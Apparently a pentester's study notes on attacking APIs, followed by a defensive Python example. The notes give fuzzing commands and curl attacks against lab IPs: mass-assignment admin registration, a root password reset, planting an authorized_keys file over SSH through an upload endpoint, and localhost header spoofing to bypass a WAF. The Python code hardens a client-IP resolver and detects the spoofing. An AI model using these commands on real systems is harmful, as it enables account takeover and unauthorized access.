APIs

Fuzzing APIs

Parameter wordlist: /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt

ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://192.168.205.249:33414/login/v1?FUZZ=1
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://192.168.205.249:33414/?FUZZ=1

Burp Intruder (Sniper attack type) can also be used for the same parameter fuzzing.

Rest APIs

APIs usually follow the format /api_name/v1, so we can enumerate them with a gobuster pattern file (pattern lines use {GOBUSTER} as the placeholder for each wordlist entry, e.g. {GOBUSTER}/v1):

gobuster dir -w directories.txt -p apis_patt.txt -u http://192.168.205.249:33414/ -t100

Inspecting the API

curl -i http://192.168.205.249:33414/help
curl http://192.168.205.249:33414/help | python -m json.tool

Directory-bust every API path you find.

Posting to an API

curl -d '{"user":"admin", "password":"test"}' -H 'Content-Type:application/json' http://192.168.205.249:33414/login/v1

curl -d '{"user":"admin", "password":"test", "admin":"True"}' -H 'Content-Type:application/json' http://192.168.205.249:33414/register/v1

Example: Changing root account password

curl 'http://192.168.50.16:33414/user/v1/root/password' -H 'Content-Type: application/json' -H 'Authorization: OAuth eyJ0eXAiOiJKV1Q' -d '{"password": "adot8"}'

curl -X 'PUT' 'http://192.168.50.16:33414/users/v1/root/password' -H 'Content-Type: application/json' -H 'Authorization: OAuth eyJ0eXAiOiJKV1Q' -d '{"password": "adot8"}'

Uploading Files

curl http://192.168.205.249:33414/file-upload -i -L -X POST -H "Content-type: multipart/form-data" -F file="@$(pwd)/authorized_keys.txt" -F filename='/home/alfredo/.ssh/authorized_keys'

WAF Bypass

Add an X-Forwarded-For: 127.0.0.1 header to the request so the application treats it as coming from localhost.

curl http://192.168.214.134:13337/logs -H 'X-Forwarded-For: 127.0.0.1'

Other headers that may be honoured the same way:

X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
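Why the header trick works, and how to close it, as an added example that is not part of the original notes: the naive resolver below believes X-Forwarded-For from anyone, while the hardened one only honours it when the TCP peer is a proxy we operate and then takes the entry that proxy appended. The proxy address 10.0.0.5, the attacker address 203.0.113.9 and the localhost-only /logs allowlist are constructed for the example.

```python
import ipaddress

# Constructed for the example: our reverse proxy, and the only source that may read /logs.
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}
LOGS_ALLOWLIST = {ipaddress.ip_address("127.0.0.1")}

# Header names are assumed already canonicalised (HTTP header names are case-insensitive).
SPOOFABLE_HEADERS = ("X-Forwarded-For", "X-Originating-IP", "X-Remote-IP",
                     "X-Remote-Addr", "X-Client-IP")


def client_ip_naive(peer_ip, headers):
    """Vulnerable: trusts X-Forwarded-For from any peer, so the requester picks
    its own "source address". This is exactly what the curl above relies on."""
    xff = headers.get("X-Forwarded-For")
    return xff.split(",")[0].strip() if xff else peer_ip


def client_ip_hardened(peer_ip, headers):
    """Honour X-Forwarded-For only when the TCP peer is a proxy we control, and
    then take the right-most entry: that is the one our proxy appended; anything
    to its left was supplied by the requester and is untrusted."""
    if ipaddress.ip_address(peer_ip) not in TRUSTED_PROXIES:
        return peer_ip
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    if not hops:
        return peer_ip
    try:
        return str(ipaddress.ip_address(hops[-1]))
    except ValueError:  # malformed header value: fall back to the real peer
        return peer_ip


def logs_allowed(peer_ip, headers, resolver):
    """Access decision for /logs using the supplied client-IP resolver."""
    return ipaddress.ip_address(resolver(peer_ip, headers)) in LOGS_ALLOWLIST


def spoof_attempt(peer_ip, headers):
    """Detection hook: any of the spoofable headers arriving directly from a
    non-proxy peer is worth alerting on; real traffic via our proxy never does that."""
    return (ipaddress.ip_address(peer_ip) not in TRUSTED_PROXIES
            and any(h in headers for h in SPOOFABLE_HEADERS))


if __name__ == "__main__":
    hdrs = {"X-Forwarded-For": "127.0.0.1"}  # constructed request sent straight to the app
    print(logs_allowed("203.0.113.9", hdrs, client_ip_naive))     # True  (bypass succeeds)
    print(logs_allowed("203.0.113.9", hdrs, client_ip_hardened))  # False (peer is not a proxy)
    print(spoof_attempt("203.0.113.9", hdrs))                     # True  (log this request)
```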
